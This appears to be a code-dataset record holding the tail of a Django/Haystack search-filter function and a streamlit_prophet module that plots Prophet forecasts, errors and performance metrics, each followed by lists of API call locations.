contributor_sq.add(SQ(contributor__exact=value), SQ.OR)
elif "owner" in field:
if owner_sq is None:
owner_sq = SQ(owner__exact=value)
else:
owner_sq.add(SQ(owner__exact=value), SQ.OR)
elif "subject" in field:
if subject_sq is None:
subject_sq = SQ(subject__exact=value)
else:
subject_sq.add(SQ(subject__exact=value), SQ.OR)
elif "content_type" in field:
if content_type_sq is None:
content_type_sq = SQ(content_type__exact=value)
else:
content_type_sq.add(SQ(content_type__exact=value), SQ.OR)
elif "availability" in field:
if availability_sq is None:
availability_sq = SQ(availability__exact=value)
else:
availability_sq.add(SQ(availability__exact=value), SQ.OR)
else:
continue
if creator_sq is not None:
sqs = sqs.filter(creator_sq)
if contributor_sq is not None:
sqs = sqs.filter(contributor_sq)
if owner_sq is not None:
sqs = sqs.filter(owner_sq)
if subject_sq is not None:
sqs = sqs.filter(subject_sq)
if content_type_sq is not None:
sqs = sqs.filter(content_type_sq)
if availability_sq is not None:
sqs = sqs.filter(availability_sq)
return sqs
| [
"django.forms.HiddenInput",
"haystack.query.SQ",
"django.forms.DateField",
"django.forms.Select",
"hs_core.discovery_parser.ParseSQ"
] | [((1117, 1167), 'django.forms.DateField', 'forms.DateField', ([], {'label': '"""From Date"""', 'required': '(False)'}), "(label='From Date', required=False)\n", (1132, 1167), False, 'from django import forms\n'), ((1183, 1231), 'django.forms.DateField', 'forms.DateField', ([], {'label': '"""To Date"""', 'required': '(False)'}), "(label='To Date', required=False)\n", (1198, 1231), False, 'from django import forms\n'), ((847, 866), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (864, 866), False, 'from django import forms\n'), ((919, 938), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (936, 938), False, 'from django import forms\n'), ((991, 1010), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (1008, 1010), False, 'from django import forms\n'), ((1063, 1082), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (1080, 1082), False, 'from django import forms\n'), ((1275, 1294), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (1292, 1294), False, 'from django import forms\n'), ((1403, 1443), 'django.forms.Select', 'forms.Select', ([], {'choices': 'SORT_ORDER_CHOICES'}), '(choices=SORT_ORDER_CHOICES)\n', (1415, 1443), False, 'from django import forms\n'), ((1600, 1644), 'django.forms.Select', 'forms.Select', ([], {'choices': 'SORT_DIRECTION_CHOICES'}), '(choices=SORT_DIRECTION_CHOICES)\n', (1612, 1644), False, 'from django import forms\n'), ((2246, 2255), 'hs_core.discovery_parser.ParseSQ', 'ParseSQ', ([], {}), '()\n', (2253, 2255), False, 'from hs_core.discovery_parser import ParseSQ, MatchingBracketsNotFoundError, FieldNotRecognizedError, InequalityNotAllowedError, MalformedDateError\n'), ((4994, 5022), 'haystack.query.SQ', 'SQ', ([], {'end_date__gte': 'start_date'}), '(end_date__gte=start_date)\n', (4996, 5022), False, 'from haystack.query import SQ\n'), ((5054, 5082), 'haystack.query.SQ', 'SQ', ([], {'start_date__lte': 'end_date'}), '(start_date__lte=end_date)\n', (5056, 5082), False, 'from haystack.query import SQ\n'), ((5138, 5166), 'haystack.query.SQ', 'SQ', ([], {'end_date__gte': 'start_date'}), '(end_date__gte=start_date)\n', (5140, 5166), False, 'from haystack.query import SQ\n'), ((5221, 5249), 'haystack.query.SQ', 'SQ', ([], {'start_date__lte': 'end_date'}), '(start_date__lte=end_date)\n', (5223, 5249), False, 'from haystack.query import SQ\n'), ((6021, 6045), 'haystack.query.SQ', 'SQ', ([], {'creator__exact': 'value'}), '(creator__exact=value)\n', (6023, 6045), False, 'from haystack.query import SQ\n'), ((6276, 6304), 'haystack.query.SQ', 'SQ', ([], {'contributor__exact': 'value'}), '(contributor__exact=value)\n', (6278, 6304), False, 'from haystack.query import SQ\n'), ((6111, 6135), 'haystack.query.SQ', 'SQ', ([], {'creator__exact': 'value'}), '(creator__exact=value)\n', (6113, 6135), False, 'from haystack.query import SQ\n'), ((6374, 6402), 'haystack.query.SQ', 'SQ', ([], {'contributor__exact': 'value'}), '(contributor__exact=value)\n', (6376, 6402), False, 'from haystack.query import SQ\n'), ((6527, 6549), 'haystack.query.SQ', 'SQ', ([], {'owner__exact': 'value'}), '(owner__exact=value)\n', (6529, 6549), False, 'from haystack.query import SQ\n'), ((6613, 6635), 'haystack.query.SQ', 'SQ', ([], {'owner__exact': 'value'}), '(owner__exact=value)\n', (6615, 6635), False, 'from haystack.query import SQ\n'), ((6766, 6790), 'haystack.query.SQ', 'SQ', ([], {'subject__exact': 'value'}), '(subject__exact=value)\n', (6768, 6790), False, 'from haystack.query import SQ\n'), ((6856, 6880), 'haystack.query.SQ', 'SQ', ([], {'subject__exact': 'value'}), '(subject__exact=value)\n', (6858, 6880), False, 'from haystack.query import SQ\n'), ((7026, 7055), 'haystack.query.SQ', 'SQ', ([], {'content_type__exact': 'value'}), '(content_type__exact=value)\n', (7028, 7055), False, 'from haystack.query import SQ\n'), ((7126, 7155), 'haystack.query.SQ', 'SQ', ([], {'content_type__exact': 'value'}), '(content_type__exact=value)\n', (7128, 7155), False, 'from haystack.query import SQ\n'), ((7301, 7330), 'haystack.query.SQ', 'SQ', ([], {'availability__exact': 'value'}), '(availability__exact=value)\n', (7303, 7330), False, 'from haystack.query import SQ\n'), ((7401, 7430), 'haystack.query.SQ', 'SQ', ([], {'availability__exact': 'value'}), '(availability__exact=value)\n', (7403, 7430), False, 'from haystack.query import SQ\n')] |
from typing import Any, Dict, List
import datetime
import pandas as pd
import plotly.express as px
import plotly.figure_factory as ff
import plotly.graph_objects as go
import streamlit as st
from fbprophet import Prophet
from fbprophet.plot import plot_plotly
from plotly.subplots import make_subplots
from streamlit_prophet.lib.evaluation.metrics import get_perf_metrics
from streamlit_prophet.lib.evaluation.preparation import get_evaluation_df
from streamlit_prophet.lib.exposition.expanders import (
display_expander,
display_expanders_performance,
)
from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall
from streamlit_prophet.lib.inputs.dates import input_waterfall_dates
from streamlit_prophet.lib.utils.misc import reverse_list
def plot_overview(
make_future_forecast: bool,
use_cv: bool,
models: Dict[Any, Any],
forecasts: Dict[Any, Any],
target_col: str,
cleaning: Dict[Any, Any],
readme: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots a graph with predictions and actual values, with explanations.
Parameters
----------
make_future_forecast : bool
Whether or not a forecast is made on future dates.
use_cv : bool
Whether or not cross-validation is used.
models : Dict
Dictionary containing a model fitted on evaluation data and another model fitted on the whole dataset.
forecasts : Dict
Dictionary containing evaluation forecasts and future forecasts if a future forecast is made.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graph.
report: List[Dict[str, Any]]
List of all report components.
"""
display_expander(readme, "overview", "More info on this plot")
bool_param = False if cleaning["log_transform"] else True
if make_future_forecast:
model = models["future"]
forecast = forecasts["future"]
elif use_cv:
model = models["eval"]
forecast = forecasts["cv_with_hist"]
else:
model = models["eval"]
forecast = forecasts["eval"]
fig = plot_plotly(
model,
forecast,
ylabel=target_col,
changepoints=bool_param,
trend=bool_param,
uncertainty=bool_param,
)
st.plotly_chart(fig)
report.append({"object": fig, "name": "overview", "type": "plot"})
return report
def plot_performance(
use_cv: bool,
target_col: str,
datasets: Dict[Any, Any],
forecasts: Dict[Any, Any],
dates: Dict[Any, Any],
eval: Dict[Any, Any],
resampling: Dict[Any, Any],
config: Dict[Any, Any],
readme: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots several graphs showing model performance, with explanations.
Parameters
----------
use_cv : bool
Whether or not cross-validation is used.
target_col : str
Name of target column.
datasets : Dict
Dictionary containing evaluation dataset.
forecasts : Dict
Dictionary containing evaluation forecasts.
dates : Dict
Dictionary containing evaluation dates.
eval : Dict
Evaluation specifications (metrics, evaluation set, granularity).
resampling : Dict
Resampling specifications (granularity, dataset frequency).
config : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graphs.
report: List[Dict[str, Any]]
List of all report components.
"""
style = config["style"]
evaluation_df = get_evaluation_df(datasets, forecasts, dates, eval, use_cv)
metrics_df, metrics_dict = get_perf_metrics(
evaluation_df, eval, dates, resampling, use_cv, config
)
st.write("## Performance metrics")
display_expanders_performance(use_cv, dates, resampling, style, readme)
display_expander(readme, "helper_metrics", "How to evaluate my model?", True)
st.write("### Global performance")
report = display_global_metrics(evaluation_df, eval, dates, resampling, use_cv, config, report)
st.write("### Deep dive")
report = plot_detailed_metrics(metrics_df, metrics_dict, eval, use_cv, style, report)
st.write("## Error analysis")
display_expander(readme, "helper_errors", "How to troubleshoot forecasting errors?", True)
fig1 = plot_forecasts_vs_truth(evaluation_df, target_col, use_cv, style)
fig2 = plot_truth_vs_actual_scatter(evaluation_df, use_cv, style)
fig3 = plot_residuals_distrib(evaluation_df, use_cv, style)
st.plotly_chart(fig1)
st.plotly_chart(fig2)
st.plotly_chart(fig3)
report.append({"object": fig1, "name": "eval_forecast_vs_truth_line", "type": "plot"})
report.append({"object": fig2, "name": "eval_forecast_vs_truth_scatter", "type": "plot"})
report.append({"object": fig3, "name": "eval_residuals_distribution", "type": "plot"})
report.append({"object": evaluation_df, "name": "eval_data", "type": "dataset"})
report.append(
{"object": metrics_df.reset_index(), "name": "eval_detailed_performance", "type": "dataset"}
)
return report
def plot_components(
use_cv: bool,
make_future_forecast: bool,
target_col: str,
models: Dict[Any, Any],
forecasts: Dict[Any, Any],
cleaning: Dict[Any, Any],
resampling: Dict[Any, Any],
config: Dict[Any, Any],
readme: Dict[Any, Any],
df: pd.DataFrame,
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots a graph showing the different components of prediction, with explanations.
Parameters
----------
use_cv : bool
Whether or not cross-validation is used.
make_future_forecast : bool
Whether or not a future forecast is made.
target_col : str
Name of target column.
models : Dict
Dictionary containing a model fitted on evaluation data.
forecasts : Dict
Dictionary containing evaluation forecasts.
cleaning : Dict
Cleaning specifications.
resampling : Dict
Resampling specifications (granularity, dataset frequency).
config : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graph.
df: pd.DataFrame
Dataframe containing the ground truth.
report: List[Dict[str, Any]]
List of all report components.
"""
style = config["style"]
st.write("## Global impact")
display_expander(readme, "components", "More info on this plot")
if make_future_forecast:
forecast_df = forecasts["future"].copy()
model = models["future"]
elif use_cv:
forecast_df = forecasts["cv_with_hist"].copy()
forecast_df = forecast_df.loc[forecast_df["ds"] < forecasts["cv"].ds.min()]
model = models["eval"]
else:
forecast_df = forecasts["eval"].copy()
model = models["eval"]
fig1 = make_separate_components_plot(
model, forecast_df, target_col, cleaning, resampling, style
)
st.plotly_chart(fig1)
st.write("## Local impact")
display_expander(readme, "waterfall", "More info on this plot", True)
start_date, end_date = input_waterfall_dates(forecast_df, resampling)
fig2 = make_waterfall_components_plot(
model, forecast_df, start_date, end_date, target_col, cleaning, resampling, style, df
)
st.plotly_chart(fig2)
report.append({"object": fig1, "name": "global_components", "type": "plot"})
report.append({"object": fig2, "name": "local_components", "type": "plot"})
report.append({"object": df, "name": "model_input_data", "type": "dataset"})
return report
def plot_future(
models: Dict[Any, Any],
forecasts: Dict[Any, Any],
dates: Dict[Any, Any],
target_col: str,
cleaning: Dict[Any, Any],
readme: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Plots a graph with predictions for future dates, with explanations.
Parameters
----------
models : Dict
Dictionary containing a model fitted on the whole dataset.
forecasts : Dict
Dictionary containing future forecast.
dates : Dict
Dictionary containing future forecast dates.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
readme : Dict
Dictionary containing explanations about the graph.
report: List[Dict[str, Any]]
List of all report components.
"""
display_expander(readme, "future", "More info on this plot")
bool_param = False if cleaning["log_transform"] else True
fig = plot_plotly(
models["future"],
forecasts["future"],
ylabel=target_col,
changepoints=bool_param,
trend=bool_param,
uncertainty=bool_param,
)
fig.update_layout(xaxis_range=[dates["forecast_start_date"], dates["forecast_end_date"]])
st.plotly_chart(fig)
report.append({"object": fig, "name": "future_forecast", "type": "plot"})
report.append({"object": forecasts["future"], "name": "future_forecast", "type": "dataset"})
return report
def plot_forecasts_vs_truth(
eval_df: pd.DataFrame, target_col: str, use_cv: bool, style: Dict[Any, Any]
) -> go.Figure:
"""Creates a plotly line plot showing forecasts and actual values on evaluation period.
Parameters
----------
eval_df : pd.DataFrame
Evaluation dataframe.
target_col : str
Name of target column.
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly line plot showing forecasts and actual values on evaluation period.
"""
if use_cv:
colors = reverse_list(style["colors"], eval_df["Fold"].nunique())
fig = px.line(
eval_df,
x="ds",
y="forecast",
color="Fold",
color_discrete_sequence=colors,
)
fig.add_trace(
go.Scatter(
x=eval_df["ds"],
y=eval_df["truth"],
name="Truth",
mode="lines",
line={"color": style["color_axis"], "dash": "dot", "width": 1.5},
)
)
else:
fig = px.line(
eval_df,
x="ds",
y=["truth", "forecast"],
color_discrete_sequence=style["colors"][1:],
hover_data={"variable": True, "value": ":.4f", "ds": False},
)
fig.update_xaxes(
rangeslider_visible=True,
rangeselector=dict(
buttons=list(
[
dict(count=7, label="1w", step="day", stepmode="backward"),
dict(count=1, label="1m", step="month", stepmode="backward"),
dict(count=3, label="3m", step="month", stepmode="backward"),
dict(count=6, label="6m", step="month", stepmode="backward"),
dict(count=1, label="YTD", step="year", stepmode="todate"),
dict(count=1, label="1y", step="year", stepmode="backward"),
dict(step="all"),
]
)
),
)
fig.update_layout(
yaxis_title=target_col,
legend_title_text="",
height=500,
width=800,
title_text="Forecast vs Truth",
title_x=0.5,
title_y=1,
hovermode="x unified",
)
return fig
def plot_truth_vs_actual_scatter(
eval_df: pd.DataFrame, use_cv: bool, style: Dict[Any, Any]
) -> go.Figure:
"""Creates a plotly scatter plot showing forecasts and actual values on evaluation period.
Parameters
----------
eval_df : pd.DataFrame
Evaluation dataframe.
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly scatter plot showing forecasts and actual values on evaluation period.
"""
eval_df["date"] = eval_df["ds"].map(lambda x: x.strftime("%A %b %d %Y"))
if use_cv:
colors = reverse_list(style["colors"], eval_df["Fold"].nunique())
fig = px.scatter(
eval_df,
x="truth",
y="forecast",
color="Fold",
opacity=0.5,
color_discrete_sequence=colors,
hover_data={"date": True, "truth": ":.4f", "forecast": ":.4f"},
)
else:
fig = px.scatter(
eval_df,
x="truth",
y="forecast",
opacity=0.5,
color_discrete_sequence=style["colors"][2:],
hover_data={"date": True, "truth": ":.4f", "forecast": ":.4f"},
)
fig.add_trace(
go.Scatter(
x=eval_df["truth"],
y=eval_df["truth"],
name="optimal",
mode="lines",
line=dict(color=style["color_axis"], width=1.5),
)
)
fig.update_layout(
xaxis_title="Truth", yaxis_title="Forecast", legend_title_text="", height=450, width=800
)
return fig
def plot_residuals_distrib(eval_df: pd.DataFrame, use_cv: bool, style: Dict[Any, Any]) -> go.Figure:
"""Creates a plotly distribution plot showing distribution of residuals on evaluation period.
Parameters
----------
eval_df : pd.DataFrame
Evaluation dataframe.
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly distribution plot showing distribution of residuals on evaluation period.
"""
eval_df["residuals"] = eval_df["forecast"] - eval_df["truth"]
if len(eval_df) >= 10:
x_min, x_max = eval_df["residuals"].quantile(0.005), eval_df["residuals"].quantile(0.995)
else:
x_min, x_max = eval_df["residuals"].min(), eval_df["residuals"].max()
if use_cv:
labels = sorted(eval_df["Fold"].unique(), reverse=True)
residuals = [eval_df.loc[eval_df["Fold"] == fold, "residuals"] for fold in labels]
residuals = [x[x.between(x_min, x_max)] for x in residuals]
else:
labels = [""]
residuals_series = pd.Series(eval_df["residuals"])
residuals = [residuals_series[residuals_series.between(x_min, x_max)]]
colors = (
reverse_list(style["colors"], eval_df["Fold"].nunique()) if use_cv else [style["colors"][2]]
)
fig = ff.create_distplot(residuals, labels, show_hist=False, colors=colors)
fig.update_layout(
title_text="Distribution of errors",
title_x=0.5,
title_y=0.85,
xaxis_title="Error (Forecast - Truth)",
showlegend=True if use_cv else False,
xaxis_zeroline=True,
xaxis_zerolinecolor=style["color_axis"],
xaxis_zerolinewidth=1,
yaxis_zeroline=True,
yaxis_zerolinecolor=style["color_axis"],
yaxis_zerolinewidth=1,
yaxis_rangemode="tozero",
height=500,
width=800,
)
return fig
def plot_detailed_metrics(
metrics_df: pd.DataFrame,
perf: Dict[Any, Any],
eval: Dict[Any, Any],
use_cv: bool,
style: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Displays a dataframe or plots graphs showing model performance on selected metrics.
Parameters
----------
metrics_df : pd.DataFrame
Dataframe containing model performance on different metrics at the desired granularity.
perf : Dict
Dictionary containing model performance on different metrics at the desired granularity.
eval : Dict
Evaluation specifications (evaluation set, selected metrics, granularity).
use_cv : bool
Whether or not cross-validation is used.
style : Dict
Style specifications for the graph (colors).
report: List[Dict[str, Any]]
List of all report components.
"""
metrics = [metric for metric in perf.keys() if perf[metric][eval["granularity"]].nunique() > 1]
if len(metrics) > 0:
fig = make_subplots(
rows=len(metrics) // 2 + len(metrics) % 2, cols=2, subplot_titles=metrics
)
for i, metric in enumerate(metrics):
colors = (
style["colors"]
if use_cv
else [style["colors"][i % len(style["colors"])]]
* perf[metric][eval["granularity"]].nunique()
)
fig_metric = go.Bar(
x=perf[metric][eval["granularity"]], y=perf[metric][metric], marker_color=colors
)
fig.append_trace(fig_metric, row=i // 2 + 1, col=i % 2 + 1)
fig.update_layout(
height=300 * (len(metrics) // 2 + len(metrics) % 2),
width=1000,
showlegend=False,
)
st.plotly_chart(fig)
report.append({"object": fig, "name": "eval_detailed_performance", "type": "plot"})
else:
st.dataframe(metrics_df)
return report
def make_separate_components_plot(
model: Prophet,
forecast_df: pd.DataFrame,
target_col: str,
cleaning: Dict[Any, Any],
resampling: Dict[Any, Any],
style: Dict[Any, Any],
) -> go.Figure:
"""Creates plotly area charts with the components of the prediction, each one on its own subplot.
Parameters
----------
model : Prophet
Fitted model.
forecast_df : pd.DataFrame
Predictions of Prophet model.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
resampling : Dict
Resampling specifications (granularity, dataset frequency).
style : Dict
Style specifications for the graph (colors).
Returns
-------
go.Figure
Plotly area charts with the components of the prediction, each one on its own subplot.
"""
components = get_forecast_components(model, forecast_df)
features = components.columns
n_features = len(components.columns)
fig = make_subplots(rows=n_features, cols=1, subplot_titles=features)
for i, col in enumerate(features):
if col == "daily":
hours = forecast_df["ds"].groupby(forecast_df.ds.dt.hour).last()
values = forecast_df.loc[forecast_df.ds.isin(hours), ("ds", col)]
values = values.iloc[values.ds.dt.hour.values.argsort()] # sort by hour order
y = values[col]
x = values.ds.map(lambda h: h.strftime("%H:%M"))
elif col == "weekly":
days = forecast_df["ds"].groupby(forecast_df.ds.dt.dayofweek).last()
values = forecast_df.loc[forecast_df.ds.isin(days), ("ds", col)]
values = values.iloc[
values.ds.dt.dayofweek.values.argsort()
] # sort by day of week order
y = values[col]
x = values.ds.dt.day_name()
elif col == "monthly":
days = forecast_df["ds"].groupby(forecast_df.ds.dt.day).last()
values = forecast_df.loc[forecast_df.ds.isin(days), ("ds", col)]
values = values.iloc[values.ds.dt.day.values.argsort()] # sort by day of month order
y = values[col]
x = values.ds.dt.day
elif col == "yearly":
year = forecast_df["ds"].max().year - 1
days = pd.date_range(start=f"{year}-01-01", end=f"{year}-12-31")
y = forecast_df.loc[forecast_df["ds"].isin(days), col]
x = days.dayofyear
else:
x = components.index
y = components[col]
fig.append_trace(
go.Scatter(
x=x,
y=y,
fill="tozeroy",
name=col,
mode="lines",
line=dict(color=style["colors"][i % len(style["colors"])]),
),
row=i + 1,
col=1,
)
y_label = f"log {target_col}" if cleaning["log_transform"] else target_col
fig.update_yaxes(title_text=f"{y_label} / {resampling['freq']}", row=i + 1, col=1)
fig.update_xaxes(showgrid=False)
if col == "yearly":
fig["layout"][f"xaxis{i + 1}"].update(
tickmode="array",
tickvals=[1, 61, 122, 183, 244, 305],
ticktext=["Jan", "Mar", "May", "Jul", "Sep", "Nov"],
)
fig.update_layout(height=200 * n_features if n_features > 1 else 300, width=800)
return fig
def make_waterfall_components_plot(
model: Prophet,
forecast_df: pd.DataFrame,
start_date: datetime.date,
end_date: datetime.date,
target_col: str,
cleaning: Dict[Any, Any],
resampling: Dict[Any, Any],
style: Dict[Any, Any],
df: pd.DataFrame,
) -> go.Figure:
"""Creates a waterfall chart with the components of the prediction.
Parameters
----------
model : Prophet
Fitted model.
forecast_df : pd.DataFrame
Predictions of Prophet model.
start_date : datetime.date
Start date for components computation.
end_date : datetime.date
End date for components computation.
target_col : str
Name of target column.
cleaning : Dict
Cleaning specifications.
resampling : Dict
Resampling specifications (granularity, dataset frequency).
style : Dict
Style specifications for the graph (colors).
df: pd.DataFrame
Dataframe containing the ground truth.
Returns
-------
go.Figure
Waterfall chart with the components of prediction.
"""
N_digits = style["waterfall_digits"]
components = get_forecast_components(model, forecast_df, True).reset_index()
waterfall = prepare_waterfall(components, start_date, end_date)
truth = df.loc[
(df["ds"] >= pd.to_datetime(start_date)) & (df["ds"] < pd.to_datetime(end_date)), "y"
].mean(axis=0)
fig = go.Figure(
go.Waterfall(
orientation="v",
measure=["relative"] * (len(waterfall) - 1) + ["total"],
x=[x.capitalize() for x in list(waterfall.index)[:-1] + ["Forecast (Truth)"]],
y=list(waterfall.values),
textposition="auto",
text=[
"+" + str(round(x, N_digits)) if x > 0 else "" + str(round(x, N_digits))
for x in list(waterfall.values)[:-1]
]
+ [f"{round(waterfall.values[-1], N_digits)} ({round(truth, N_digits)})"],
decreasing={"marker": {"color": style["colors"][1]}},
increasing={"marker": {"color": style["colors"][0]}},
totals={"marker": {"color": style["colors"][2]}},
)
)
y_label = f"log {target_col}" if cleaning["log_transform"] else target_col
fig.update_yaxes(title_text=f"{y_label} / {resampling['freq']}")
fig.update_layout(
title=f"Forecast decomposition "
f"(from {start_date.strftime('%Y-%m-%d')} to {end_date.strftime('%Y-%m-%d')})",
title_x=0.2,
width=800,
)
return fig
def display_global_metrics(
evaluation_df: pd.DataFrame,
eval: Dict[Any, Any],
dates: Dict[Any, Any],
resampling: Dict[Any, Any],
use_cv: bool,
config: Dict[Any, Any],
report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Displays all global metrics.
Parameters
----------
evaluation_df : pd.DataFrame
Evaluation dataframe.
eval : Dict
Evaluation specifications.
dates : Dict
Dictionary containing all dates information.
resampling : Dict
Resampling specifications.
use_cv : bool
Whether or note cross-validation is used.
config : Dict
Lib configuration dictionary.
report: List[Dict[str, Any]]
List of all report components.
"""
eval_all = {
"granularity": "cutoff" if use_cv else "Global",
"metrics": ["RMSE", "MAPE", "MAE", "MSE", "SMAPE"],
"get_perf_on_agg_forecast": eval["get_perf_on_agg_forecast"],
}
metrics_df, _ = get_perf_metrics(evaluation_df, eval_all, dates, resampling, use_cv, config)
if use_cv:
st.dataframe(metrics_df)
else:
col1, col2, col3, col4, col5 = st.columns(5)
col1.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][0]}</p>",
unsafe_allow_html=True,
)
col1.write(metrics_df.loc["Global", eval_all["metrics"][0]])
col2.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][1]}</p>",
unsafe_allow_html=True,
)
col2.write(metrics_df.loc["Global", eval_all["metrics"][1]])
col3.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][2]}</p>",
unsafe_allow_html=True,
)
col3.write(metrics_df.loc["Global", eval_all["metrics"][2]])
col4.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][3]}</p>",
unsafe_allow_html=True,
)
col4.write(metrics_df.loc["Global", eval_all["metrics"][3]])
col5.markdown(
f"<p style='color: {config['style']['colors'][1]}; "
f"font-weight: bold; font-size: 20px;'> {eval_all['metrics'][4]}</p>",
unsafe_allow_html=True,
)
col5.write(metrics_df.loc["Global", eval_all["metrics"][4]])
report.append(
{
"object": metrics_df.loc["Global"].reset_index(),
"name": "eval_global_performance",
"type": "dataset",
}
)
return report
| [
"streamlit_prophet.lib.exposition.expanders.display_expanders_performance",
"pandas.date_range",
"pandas.to_datetime",
"plotly.graph_objects.Bar",
"plotly.express.scatter",
"fbprophet.plot.plot_plotly",
"plotly.express.line",
"plotly.graph_objects.Scatter",
"streamlit.columns",
"plotly.figure_fact... | [((1846, 1908), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""overview"""', '"""More info on this plot"""'], {}), "(readme, 'overview', 'More info on this plot')\n", (1862, 1908), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((2253, 2371), 'fbprophet.plot.plot_plotly', 'plot_plotly', (['model', 'forecast'], {'ylabel': 'target_col', 'changepoints': 'bool_param', 'trend': 'bool_param', 'uncertainty': 'bool_param'}), '(model, forecast, ylabel=target_col, changepoints=bool_param,\n trend=bool_param, uncertainty=bool_param)\n', (2264, 2371), False, 'from fbprophet.plot import plot_plotly\n'), ((2427, 2447), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig'], {}), '(fig)\n', (2442, 2447), True, 'import streamlit as st\n'), ((3733, 3792), 'streamlit_prophet.lib.evaluation.preparation.get_evaluation_df', 'get_evaluation_df', (['datasets', 'forecasts', 'dates', 'eval', 'use_cv'], {}), '(datasets, forecasts, dates, eval, use_cv)\n', (3750, 3792), False, 'from streamlit_prophet.lib.evaluation.preparation import get_evaluation_df\n'), ((3824, 3896), 'streamlit_prophet.lib.evaluation.metrics.get_perf_metrics', 'get_perf_metrics', (['evaluation_df', 'eval', 'dates', 'resampling', 'use_cv', 'config'], {}), '(evaluation_df, eval, dates, resampling, use_cv, config)\n', (3840, 3896), False, 'from streamlit_prophet.lib.evaluation.metrics import get_perf_metrics\n'), ((3915, 3949), 'streamlit.write', 'st.write', (['"""## Performance metrics"""'], {}), "('## Performance metrics')\n", (3923, 3949), True, 'import streamlit as st\n'), ((3954, 4025), 'streamlit_prophet.lib.exposition.expanders.display_expanders_performance', 'display_expanders_performance', (['use_cv', 'dates', 'resampling', 'style', 'readme'], {}), '(use_cv, dates, resampling, style, readme)\n', (3983, 4025), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((4030, 4107), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""helper_metrics"""', '"""How to evaluate my model?"""', '(True)'], {}), "(readme, 'helper_metrics', 'How to evaluate my model?', True)\n", (4046, 4107), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((4112, 4146), 'streamlit.write', 'st.write', (['"""### Global performance"""'], {}), "('### Global performance')\n", (4120, 4146), True, 'import streamlit as st\n'), ((4251, 4276), 'streamlit.write', 'st.write', (['"""### Deep dive"""'], {}), "('### Deep dive')\n", (4259, 4276), True, 'import streamlit as st\n'), ((4371, 4400), 'streamlit.write', 'st.write', (['"""## Error analysis"""'], {}), "('## Error analysis')\n", (4379, 4400), True, 'import streamlit as st\n'), ((4405, 4499), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""helper_errors"""', '"""How to troubleshoot forecasting errors?"""', '(True)'], {}), "(readme, 'helper_errors',\n 'How to troubleshoot forecasting errors?', True)\n", (4421, 4499), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((4711, 4732), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig1'], {}), '(fig1)\n', (4726, 4732), True, 'import streamlit as st\n'), ((4737, 4758), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig2'], {}), '(fig2)\n', (4752, 4758), True, 'import streamlit as st\n'), ((4763, 4784), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig3'], {}), '(fig3)\n', (4778, 4784), True, 'import streamlit as st\n'), ((6572, 6600), 'streamlit.write', 'st.write', (['"""## Global impact"""'], {}), "('## Global impact')\n", (6580, 6600), True, 'import streamlit as st\n'), ((6605, 6669), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""components"""', '"""More info on this plot"""'], {}), "(readme, 'components', 'More info on this plot')\n", (6621, 6669), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((7176, 7197), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig1'], {}), '(fig1)\n', (7191, 7197), True, 'import streamlit as st\n'), ((7203, 7230), 'streamlit.write', 'st.write', (['"""## Local impact"""'], {}), "('## Local impact')\n", (7211, 7230), True, 'import streamlit as st\n'), ((7235, 7304), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""waterfall"""', '"""More info on this plot"""', '(True)'], {}), "(readme, 'waterfall', 'More info on this plot', True)\n", (7251, 7304), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((7332, 7378), 'streamlit_prophet.lib.inputs.dates.input_waterfall_dates', 'input_waterfall_dates', (['forecast_df', 'resampling'], {}), '(forecast_df, resampling)\n', (7353, 7378), False, 'from streamlit_prophet.lib.inputs.dates import 